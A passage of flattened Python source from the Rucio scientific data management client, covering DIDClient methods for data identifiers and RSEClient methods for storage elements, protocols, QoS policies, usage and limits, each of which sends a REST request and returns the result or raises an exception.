path = '/'.join([self.DIDS_BASEURL, quote_plus(scope), quote_plus(name), 'dids'])
url = build_url(choice(self.list_hosts), path=path)
data = {'dids': dids}
r = self._send_request(url, type_='DEL', data=render_json(**data))
if r.status_code == codes.ok:
return True
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def attach_dids_to_dids(self, attachments, ignore_duplicate=False):
"""
Add dids to dids.
:param attachments: The attachments.
attachments is: [attachment, attachment, ...]
attachment is: {'scope': scope, 'name': name, 'dids': dids}
dids is: [{'scope': scope, 'name': name}, ...]
:param ignore_duplicate: If True, ignore duplicate entries.
"""
path = '/'.join([self.DIDS_BASEURL, 'attachments'])
url = build_url(choice(self.list_hosts), path=path)
data = {'ignore_duplicate': ignore_duplicate, 'attachments': attachments}
r = self._send_request(url, type_='POST', data=dumps(data))
if r.status_code in (codes.ok, codes.no_content, codes.created):
return True
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def add_files_to_datasets(self, attachments, ignore_duplicate=False):
"""
Add files to datasets.
:param attachments: The attachments.
attachments is: [attachment, attachment, ...]
attachment is: {'scope': scope, 'name': name, 'dids': dids}
dids is: [{'scope': scope, 'name': name}, ...]
:param ignore_duplicate: If True, ignore duplicate entries.
"""
return self.attach_dids_to_dids(attachments=attachments,
ignore_duplicate=ignore_duplicate)
def add_datasets_to_containers(self, attachments):
"""
Add datasets_to_containers.
:param attachments: The attachments.
attachments is: [attachment, attachment, ...]
attachment is: {'scope': scope, 'name': name, 'dids': dids}
dids is: [{'scope': scope, 'name': name}, ...]
"""
return self.attach_dids_to_dids(attachments=attachments)
def add_containers_to_containers(self, attachments):
"""
Add containers_to_containers.
:param attachments: The attachments.
attachments is: [attachment, attachment, ...]
attachment is: {'scope': scope, 'name': name, 'dids': dids}
dids is: [{'scope': scope, 'name': name}, ...]
"""
return self.attach_dids_to_dids(attachments=attachments)
def add_files_to_dataset(self, scope, name, files, rse=None):
"""
Add files to datasets.
:param scope: The scope name.
:param name: The dataset name.
:param files: The content.
:param rse: The RSE name when registering replicas.
"""
return self.attach_dids(scope=scope, name=name, dids=files, rse=rse)
def add_files_to_archive(self, scope, name, files):
"""
Add files to archive.
:param scope: The scope name.
:param name: The dataset name.
:param files: The content.
"""
return self.attach_dids(scope=scope, name=name, dids=files)
def add_datasets_to_container(self, scope, name, dsns):
"""
Add datasets to container.
:param scope: The scope name.
:param name: The dataset name.
:param dsns: The content.
"""
return self.attach_dids(scope=scope, name=name, dids=dsns)
def add_containers_to_container(self, scope, name, cnts):
"""
Add containers to container.
:param scope: The scope name.
:param name: The dataset name.
:param cnts: The content.
"""
return self.attach_dids(scope=scope, name=name, dids=cnts)
def list_content(self, scope, name):
"""
List data identifier contents.
:param scope: The scope name.
:param name: The data identifier name.
"""
path = '/'.join([self.DIDS_BASEURL, quote_plus(scope), quote_plus(name), 'dids'])
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='GET')
if r.status_code == codes.ok:
return self._load_json_data(r)
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def list_content_history(self, scope, name):
"""
List data identifier contents history.
:param scope: The scope name.
:param name: The data identifier name.
"""
path = '/'.join([self.DIDS_BASEURL, quote_plus(scope), quote_plus(name), 'dids', 'history'])
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='GET')
if r.status_code == codes.ok:
return self._load_json_data(r)
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def list_files(self, scope, name, long=None):
"""
List data identifier file contents.
:param scope: The scope name.
:param name: The data identifier name.
:param long: A boolean to choose if GUID is returned or not.
"""
payload = {}
path = '/'.join([self.DIDS_BASEURL, quote_plus(scope), quote_plus(name), 'files'])
if long:
payload['long'] = True
url = build_url(choice(self.list_hosts), path=path, params=payload)
r = self._send_request(url, type_='GET')
if r.status_code == codes.ok:
return self._load_json_data(r)
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def get_did(self, scope, name, dynamic=False, dynamic_depth=None):
"""
Retrieve a single data identifier.
:param scope: The scope name.
:param name: The data identifier name.
:param dynamic_depth: The DID type as string ('FILE'/'DATASET') at which to stop the dynamic
length/bytes calculation. If not set, the size will not be computed dynamically.
:param dynamic: (Deprecated) same as dynamic_depth = 'FILE'
"""
path = '/'.join([self.DIDS_BASEURL, quote_plus(scope), quote_plus(name)])
params = {}
if dynamic_depth:
params['dynamic_depth'] = dynamic_depth
elif dynamic:
params['dynamic_depth'] = 'FILE'
url = build_url(choice(self.list_hosts), path=path, params=params)
r = self._send_request(url, type_='GET')
if r.status_code == codes.ok:
return next(self._load_json_data(r))
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def get_metadata(self, scope, name, plugin='DID_COLUMN'):
"""
Get data identifier metadata
:param scope: The scope name.
:param name: The data identifier name.
:param plugin: Backend Metadata plugin the Rucio server should use to query data.
"""
path = '/'.join([self.DIDS_BASEURL, quote_plus(scope), quote_plus(name), 'meta'])
url = build_url(choice(self.list_hosts), path=path)
payload = {}
payload['plugin'] = plugin
r = self._send_request(url, type_='GET', params=payload)
if r.status_code == codes.ok:
meta = self._load_json_data(r)
return next(meta)
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def get_metadata_bulk(self, dids, inherit=False):
"""
Bulk get data identifier metadata
:param inherit: A boolean. If set to true, the metadata of the parent are concatenated.
:param dids: A list of dids.
"""
data = {'dids': dids, 'inherit': inherit}
path = '/'.join([self.DIDS_BASEURL, 'bulkmeta'])
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='POST', data=dumps(data))
if r.status_code == codes.ok:
return self._load_json_data(r)
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def set_metadata(self, scope, name, key, value, recursive=False):
"""
Set data identifier metadata
:param scope: The scope name.
:param name: The data identifier name.
:param key: the key.
:param value: the value.
:param recursive: Option to propagate the metadata change to content.
"""
path = '/'.join([self.DIDS_BASEURL, quote_plus(scope), quote_plus(name), 'meta', key])
url = build_url(choice(self.list_hosts), path=path)
data = dumps({'value': value, 'recursive': recursive})
r = self._send_request(url, type_='POST', data=data)
if r.status_code == codes.created:
return True
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def set_metadata_bulk(self, scope, name, meta, recursive=False):
"""
Set data identifier metadata in bulk.
:param scope: The scope name.
:param name: The data identifier name.
:param meta: the metadata key-values.
:type meta: dict
:param recursive: Option to propagate the metadata change to content.
"""
path = '/'.join([self.DIDS_BASEURL, quote_plus(scope), quote_plus(name), 'meta'])
url = build_url(choice(self.list_hosts), path=path)
data = dumps({'meta': meta, 'recursive': recursive})
r = self._send_request(url, type_='POST', data=data)
if r.status_code == codes.created:
return True
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def set_dids_metadata_bulk(self, dids, recursive=False):
"""
Set metadata to a list of data identifiers.
:param dids: A list of dids including metadata, i.e. [['scope': scope1, 'name': name1, 'meta': {key1: value1, key2: value2}] .
:param recursive: Option to propagate the metadata update to content.
"""
path = '/'.join([self.DIDS_BASEURL, 'bulkdidsmeta'])
url = build_url(choice(self.list_hosts), path=path)
data = dumps({'dids': dids, 'recursive': recursive})
r = self._send_request(url, type_='POST', data=data)
if r.status_code == codes.created:
return True
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def set_status(self, scope, name, **kwargs):
"""
Set data identifier status
:param scope: The scope name.
:param name: The data identifier name.
:param kwargs: Keyword arguments of the form status_name=value.
"""
path = '/'.join([self.DIDS_BASEURL, quote_plus(scope), quote_plus(name), 'status'])
url = build_url(choice(self.list_hosts), path=path)
data = dumps(kwargs)
r = self._send_request(url, type_='PUT', data=data)
if r.status_code in (codes.ok, codes.no_content, codes.created):
return True
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def close(self, scope, name):
"""
close dataset/container
:param scope: The scope name.
:param name: The dataset/container name.
"""
return self.set_status(scope=scope, name=name, open=False)
def delete_metadata(self, scope, name, key):
"""
Delete data identifier metadata
:param scope: The scope name.
:param name: The data identifier.
:param key: the key.
"""
path = '/'.join([self.DIDS_BASEURL, quote_plus(scope), quote_plus(name), 'meta'])
url = build_url(choice(self.list_hosts), path=path, params={'key': key})
r = self._send_request(url, type_='DEL')
if r.status_code == codes.ok:
return True
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def list_did_rules(self, scope, name):
"""
List the associated rules of a data identifier.
:param scope: The scope name.
:param name: The data identifier name.
"""
path = '/'.join([self.DIDS_BASEURL, quote_plus(scope), quote_plus(name), 'rules'])
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='GET')
if r.status_code == codes.ok:
return self._load_json_data(r)
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def list_associated_rules_for_file(self, scope, name):
"""
List the associated rules a file is affected from..
:param scope: The scope name.
:param name: The file name.
"""
path = '/'.join([self.DIDS_BASEURL, quote_plus(scope), quote_plus(name), 'associated_rules'])
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='GET')
if r.status_code == codes.ok:
return self._load_json_data(r)
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def get_dataset_by_guid(self, guid):
"""
Get the parent datasets for a given GUID.
:param guid: The GUID.
:returns: A did
"""
path = '/'.join([self.DIDS_BASEURL, guid, 'guid'])
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='GET')
if r.status_code == codes.ok:
return self._load_json_data(r)
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def scope_list(self, scope, name=None, recursive=False):
"""
List data identifiers in a scope.
:param scope: The scope name.
:param name: The data identifier name.
:param recursive: boolean, True or False.
"""
payload = {}
path = '/'.join([self.DIDS_BASEURL, quote_plus(scope), ''])
if name:
payload['name'] = name
if recursive:
payload['recursive'] = True
url = build_url(choice(self.list_hosts), path=path, params=payload)
r = self._send_request(url, type_='GET')
if r.status_code == codes.ok:
return self._load_json_data(r)
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def list_parent_dids(self, scope, name):
"""
List parent dataset/containers of a did.
:param scope: The scope.
:param name: The name.
"""
path = '/'.join([self.DIDS_BASEURL, quote_plus(scope), quote_plus(name), 'parents'])
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='GET')
if r.status_code == codes.ok:
return self._load_json_data(r)
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def create_did_sample(self, input_scope, input_name, output_scope, output_name, nbfiles):
"""
Create a sample from an input collection.
:param input_scope: The scope of the input DID.
:param input_name: The name of the input DID.
:param output_scope: The scope of the output dataset.
:param output_name: The name of the output dataset.
:param account: The account.
:param nbfiles: The number of files to register in the output dataset.
"""
path = '/'.join([self.DIDS_BASEURL, 'sample'])
data = dumps({
'input_scope': input_scope,
'input_name': input_name,
'output_scope': output_scope,
'output_name': output_name,
'nbfiles': str(nbfiles)
})
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='POST', data=data)
if r.status_code == codes.created:
return True
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def resurrect(self, dids):
"""
Resurrect a list of dids.
:param dids: A list of dids [{'scope': scope, 'name': name}, ...]
"""
path = '/'.join([self.DIDS_BASEURL, 'resurrect'])
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='POST', data=dumps(dids))
if r.status_code == codes.created:
return True
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def add_temporary_dids(self, dids):
"""
Bulk add temporary data identifiers.
:param dids: A list of dids.
"""
url = build_url(choice(self.list_hosts), path='tmp_dids')
r = self._send_request(url, type_='POST', data=dumps(dids))
if r.status_code == codes.created:
return True
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def list_archive_content(self, scope, name):
"""
List archive contents.
:param scope: The scope name.
:param name: The data identifier name.
"""
path = '/'.join([self.ARCHIVES_BASEURL, quote_plus(scope), quote_plus(name), 'files'])
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='GET')
if r.status_code == codes.ok:
return self._load_json_data(r)
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg) | /rucio-clients-32.2.0.tar.gz/rucio-clients-32.2.0/lib/rucio/client/didclient.py | 0.782829 | 0.257882 | didclient.py | pypi |
from json import dumps, loads
from urllib.parse import quote
from requests.status_codes import codes
from rucio.client.baseclient import BaseClient
from rucio.client.baseclient import choice
from rucio.common.utils import build_url
class RSEClient(BaseClient):
"""RSE client class for working with rucio RSEs"""
RSE_BASEURL = 'rses'
def get_rse(self, rse):
"""
Returns details about the referred RSE.
:param rse: Name of the referred RSE
:returns: A dict containing all attributes of the referred RSE
:raises RSENotFound: if the referred RSE was not found in the database
"""
path = '/'.join([self.RSE_BASEURL, rse])
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='GET')
if r.status_code == codes.ok:
rse = loads(r.text)
return rse
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def add_rse(self, rse, **kwargs):
"""
Sends the request to create a new RSE.
:param rse: the name of the rse.
:param deterministic: Boolean to know if the pfn is generated deterministically.
:param volatile: Boolean for RSE cache.
:param city: City for the RSE.
:param region_code: The region code for the RSE.
:param country_name: The country.
:param continent: The continent.
:param time_zone: Timezone.
:param staging_area: Staging area.
:param ISP: Internet service provider.
:param rse_type: RSE type.
:param latitude: Latitude coordinate of RSE.
:param longitude: Longitude coordinate of RSE.
:param ASN: Access service network.
:param availability: Availability.
:return: True if location was created successfully else False.
:raises Duplicate: if rse already exists.
"""
path = 'rses/' + rse
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='POST', data=dumps(kwargs))
if r.status_code == codes.created:
return True
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def update_rse(self, rse, parameters):
"""
Update RSE properties like availability or name.
:param rse: the name of the new rse.
:param parameters: A dictionnary with property (name, read, write, delete as keys).
"""
path = 'rses/' + rse
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='PUT', data=dumps(parameters))
if r.status_code == codes.created:
return True
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def delete_rse(self, rse):
"""
Sends the request to delete a rse.
:param rse: the name of the rse.
:return: True if location was created successfully else False.
"""
path = 'rses/' + rse
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='DEL')
if r.status_code == codes.ok:
return True
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def list_rses(self, rse_expression=None):
"""
Sends the request to list all rucio locations(RSEs).
:rse_expression: RSE Expression to use as filter.
:return: a list containing the names of all rucio locations.
"""
if rse_expression:
path = ['rses', "?expression=" + quote(rse_expression)]
path = '/'.join(path)
else:
path = 'rses/'
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='GET')
if r.status_code == codes.ok:
return self._load_json_data(r)
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def add_rse_attribute(self, rse, key, value):
"""
Sends the request to add a RSE attribute.
:param rse: the name of the rse.
:param key: the attribute key.
:param value: the attribute value.
:return: True if RSE attribute was created successfully else False.
:raises Duplicate: if RSE attribute already exists.
"""
path = '/'.join([self.RSE_BASEURL, rse, 'attr', key])
url = build_url(choice(self.list_hosts), path=path)
data = dumps({'value': value})
r = self._send_request(url, type_='POST', data=data)
if r.status_code == codes.created:
return True
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def delete_rse_attribute(self, rse, key):
"""
Sends the request to delete a RSE attribute.
:param rse: the RSE name.
:param key: the attribute key.
:return: True if RSE attribute was deleted successfully else False.
"""
path = '/'.join([self.RSE_BASEURL, rse, 'attr', key])
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='DEL')
if r.status_code == codes.ok:
return True
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def list_rse_attributes(self, rse):
"""
Sends the request to get RSE attributes.
:param rse: The RSE name.
:return: A ``dict`` with the RSE attribute name/value pairs.
"""
path = '/'.join([self.RSE_BASEURL, rse, 'attr/'])
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='GET')
if r.status_code == codes.ok:
attributes = loads(r.text)
return attributes
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def add_protocol(self, rse, params):
"""
Sends the request to create a new protocol for the given RSE.
:param rse: the name of the rse.
:param scheme: identifier of this protocol
:param params: Attributes of the protocol. Supported are:
hostname: hostname for this protocol (default = localhost)
port: port for this protocol (default = 0)
prefix: string used as a prfeix for this protocol when generating the PFN (default = None)
impl: qualified name of the implementation class for this protocol (mandatory)
read: integer representing the priority of this procotol for read operations (default = -1)
write: integer representing the priority of this procotol for write operations (default = -1)
delete: integer representing the priority of this procotol for delete operations (default = -1)
extended_attributes: miscellaneous protocol specific information e.g. spacetoken for SRM (default = None)
:return: True if protocol was created successfully else False.
:raises Duplicate: if protocol with same hostname, port and protocol identifier
already exists for the given RSE.
:raises RSENotFound: if the RSE doesn't exist.
:raises KeyNotFound: if params is missing manadtory attributes to create the
protocol.
:raises AccessDenied: if not authorized.
"""
scheme = params['scheme']
path = '/'.join([self.RSE_BASEURL, rse, 'protocols', scheme])
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='POST', data=dumps(params))
if r.status_code == codes.created:
return True
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def get_protocols(self, rse, protocol_domain='ALL', operation=None, default=False, scheme=None):
"""
Returns protocol information. Parameter comibantions are:
(operation OR default) XOR protocol.
:param rse: the RSE name.
:param protocol_domain: The scope of the protocol. Supported are 'LAN', 'WAN', and 'ALL' (as default).
:param operation: The name of the requested operation (read, write, or delete).
If None, all operations are queried.
:param default: Indicates if only the default operations should be returned.
:param scheme: The identifier of the requested protocol.
:returns: A list with details about each matching protocol.
:raises RSENotFound: if the RSE doesn't exist.
:raises RSEProtocolNotSupported: if no matching protocol entry could be found.
:raises RSEOperationNotSupported: if no matching protocol entry for the requested
operation could be found.
"""
path = None
params = {}
if scheme:
path = '/'.join([self.RSE_BASEURL, rse, 'protocols', scheme])
else:
path = '/'.join([self.RSE_BASEURL, rse, 'protocols'])
if operation:
params['operation'] = operation
if default:
params['default'] = default
params['protocol_domain'] = protocol_domain
url = build_url(choice(self.list_hosts), path=path, params=params)
r = self._send_request(url, type_='GET')
if r.status_code == codes.ok:
protocols = loads(r.text)
return protocols
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def lfns2pfns(self, rse, lfns, protocol_domain='ALL', operation=None, scheme=None):
"""
Returns PFNs that should be used at a RSE, corresponding to requested LFNs.
The PFNs are generated for the RSE *regardless* of whether a replica exists for the LFN.
:param rse: the RSE name
:param lfns: A list of LFN strings to translate to PFNs.
:param protocol_domain: The scope of the protocol. Supported are 'LAN', 'WAN', and 'ALL' (as default).
:param operation: The name of the requested operation (read, write, or delete).
If None, all operations are queried.
:param scheme: The identifier of the requested protocol (gsiftp, https, davs, etc).
:returns: A dictionary of LFN / PFN pairs.
:raises RSENotFound: if the RSE doesn't exist.
:raises RSEProtocolNotSupported: if no matching protocol entry could be found.
:raises RSEOperationNotSupported: if no matching protocol entry for the requested
operation could be found.
"""
path = '/'.join([self.RSE_BASEURL, rse, 'lfns2pfns'])
params = []
if scheme:
params.append(('scheme', scheme))
if protocol_domain != 'ALL':
params.append(('domain', protocol_domain))
if operation:
params.append(('operation', operation))
for lfn in lfns:
params.append(('lfn', lfn))
url = build_url(choice(self.list_hosts), path=path, params=params, doseq=True)
r = self._send_request(url, type_='GET')
if r.status_code == codes.ok:
pfns = loads(r.text)
return pfns
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def delete_protocols(self, rse, scheme, hostname=None, port=None):
"""
Deletes matching protocols from RSE. Protocols using the same identifier can be
distinguished by hostname and port.
:param rse: the RSE name.
:param scheme: identifier of the protocol.
:param hostname: hostname of the protocol.
:param port: port of the protocol.
:returns: True if success.
:raises RSEProtocolNotSupported: if no matching protocol entry could be found.
:raises RSENotFound: if the RSE doesn't exist.
:raises AccessDenied: if not authorized.
"""
path = [self.RSE_BASEURL, rse, 'protocols', scheme]
if hostname:
path.append(hostname)
if port:
path.append(str(port))
path = '/'.join(path)
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='DEL')
if r.status_code == codes.ok:
return True
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def update_protocols(self, rse, scheme, data, hostname=None, port=None):
"""
Updates matching protocols from RSE. Protocol using the same identifier can be
distinguished by hostname and port.
:param rse: the RSE name.
:param scheme: identifier of the protocol.
:param data: A dict providing the new values of the protocol attibutes.
Keys must match column names in database.
:param hostname: hostname of the protocol.
:param port: port of the protocol.
:returns: True if success.
:raises RSEProtocolNotSupported: if no matching protocol entry could be found.
:raises RSENotFound: if the RSE doesn't exist.
:raises KeyNotFound: if invalid data was provided for update.
:raises AccessDenied: if not authorized.
"""
path = [self.RSE_BASEURL, rse, 'protocols', scheme]
if hostname:
path.append(hostname)
if port:
path.append(str(port))
path = '/'.join(path)
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='PUT', data=dumps(data))
if r.status_code == codes.ok:
return True
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def swap_protocols(self, rse, domain, operation, scheme_a, scheme_b):
"""
Swaps the priorities of the provided operation.
:param rse: the RSE name.
:param domain: the domain in which priorities should be swapped i.e. wan or lan.
:param operation: the operation that should be swapped i.e. read, write, or delete.
:param scheme_a: the scheme of one of the two protocols to be swapped, e.g. srm.
:param scheme_b: the scheme of the other of the two protocols to be swapped, e.g. http.
:returns: True if success.
:raises RSEProtocolNotSupported: if no matching protocol entry could be found.
:raises RSENotFound: if the RSE doesn't exist.
:raises KeyNotFound: if invalid data was provided for update.
:raises AccessDenied: if not authorized.
"""
protocol_a = protocol_b = None
protocols = self.get_protocols(rse, domain, operation, False, scheme_a)['protocols']
for p in protocols:
if p['scheme'] == scheme_a:
protocol_a = p
if p['scheme'] == scheme_b:
protocol_b = p
if (protocol_a or protocol_b) is None:
return False
priority_a = protocol_a['domains'][domain][operation]
priority_b = protocol_b['domains'][domain][operation]
self.update_protocols(rse, protocol_a['scheme'], {'domains': {domain: {operation: priority_b}}}, protocol_a['hostname'], protocol_a['port'])
self.update_protocols(rse, protocol_b['scheme'], {'domains': {domain: {operation: priority_a}}}, protocol_b['hostname'], protocol_b['port'])
return True
def add_qos_policy(self, rse, qos_policy):
"""
Add a QoS policy from an RSE.
:param rse_id: The id of the RSE.
:param qos_policy: The QoS policy to add.
:param session: The database session in use.
:raises Duplicate: If the QoS policy already exists.
:returns: True if successful, except otherwise.
"""
path = [self.RSE_BASEURL, rse, 'qos_policy', qos_policy]
path = '/'.join(path)
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='POST')
if r.status_code == codes.created:
return True
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def delete_qos_policy(self, rse, qos_policy):
"""
Delete a QoS policy from an RSE.
:param rse_id: The id of the RSE.
:param qos_policy: The QoS policy to delete.
:param session: The database session in use.
:returns: True if successful, silent failure if QoS policy does not exist.
"""
path = [self.RSE_BASEURL, rse, 'qos_policy', qos_policy]
path = '/'.join(path)
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='DEL')
if r.status_code == codes.ok:
return True
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def list_qos_policies(self, rse):
"""
List all QoS policies of an RSE.
:param rse_id: The id of the RSE.
:param session: The database session in use.
:returns: List containing all QoS policies.
"""
path = [self.RSE_BASEURL, rse, 'qos_policy']
path = '/'.join(path)
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='GET')
if r.status_code == codes.ok:
return loads(r.text)
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def set_rse_usage(self, rse, source, used, free, files=None):
"""
Set RSE usage information.
:param rse: the RSE name.
:param source: the information source, e.g. srm.
:param used: the used space in bytes.
:param free: the free in bytes.
:param files: the number of files
:returns: True if successful, otherwise false.
"""
path = [self.RSE_BASEURL, rse, 'usage']
path = '/'.join(path)
url = build_url(choice(self.list_hosts), path=path)
data = {'source': source, 'used': used, 'free': free, 'files': files}
r = self._send_request(url, type_='PUT', data=dumps(data))
if r.status_code == codes.ok:
return True
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def get_rse_usage(self, rse, filters=None):
"""
Get RSE usage information.
:param rse: the RSE name.
:param filters: dictionary of attributes by which the results should be filtered
:returns: True if successful, otherwise false.
"""
path = [self.RSE_BASEURL, rse, 'usage']
path = '/'.join(path)
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='GET', params=filters)
if r.status_code == codes.ok:
return self._load_json_data(r)
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def list_rse_usage_history(self, rse, filters=None):
"""
List RSE usage history information.
:param rse: The RSE name.
:param filters: dictionary of attributes by which the results should be filtered.
:returns: list of dictionnaries.
"""
path = [self.RSE_BASEURL, rse, 'usage', 'history']
path = '/'.join(path)
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='GET', params=filters)
if r.status_code == codes.ok:
return self._load_json_data(r)
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers,
status_code=r.status_code,
data=r.content)
raise exc_cls(exc_msg)
def set_rse_limits(self, rse, name, value):
"""
Set RSE limit information.
:param rse: The RSE name.
:param name: The name of the limit.
:param value: The feature value.
:returns: True if successful, otherwise false.
"""
path = [self.RSE_BASEURL, rse, 'limits']
path = '/'.join(path)
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='PUT', data=dumps({'name': name, 'value': value}))
if r.status_code == codes.ok:
return True
exc_cls, exc_msg = self._get_exception(headers=r.headers,
status_code=r.status_code,
data=r.content)
raise exc_cls(exc_msg)
def get_rse_limits(self, rse):
"""
Get RSE limits.
:param rse: The RSE name.
:returns: True if successful, otherwise false.
"""
path = [self.RSE_BASEURL, rse, 'limits']
path = '/'.join(path)
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='GET')
if r.status_code == codes.ok:
return next(self._load_json_data(r))
exc_cls, exc_msg = self._get_exception(headers=r.headers,
status_code=r.status_code,
data=r.content)
raise exc_cls(exc_msg)
def delete_rse_limits(self, rse, name):
"""
Delete RSE limit information.
:param rse: The RSE name.
:param name: The name of the limit.
:returns: True if successful, otherwise false.
"""
path = [self.RSE_BASEURL, rse, 'limits']
path = '/'.join(path)
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='DEL', data=dumps({'name': name}))
if r.status_code == codes.ok:
return True
exc_cls, exc_msg = self._get_exception(headers=r.headers,
status_code=r.status_code,
data=r.content)
return exc_cls(exc_msg)
def add_distance(self, source, destination, parameters):
"""
Add a src-dest distance.
:param source: The source.
:param destination: The destination.
:param parameters: A dictionnary with property.
"""
path = [self.RSE_BASEURL, source, 'distances', destination]
path = '/'.join(path)
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='POST', data=dumps(parameters))
if r.status_code == codes.created:
return True
exc_cls, exc_msg = self._get_exception(headers=r.headers,
status_code=r.status_code,
data=r.content)
raise exc_cls(exc_msg)
def update_distance(self, source, destination, parameters):
"""
Update distances with the given RSE ids.
:param source: The source.
:param destination: The destination.
:param parameters: A dictionnary with property.
"""
path = [self.RSE_BASEURL, source, 'distances', destination]
path = '/'.join(path)
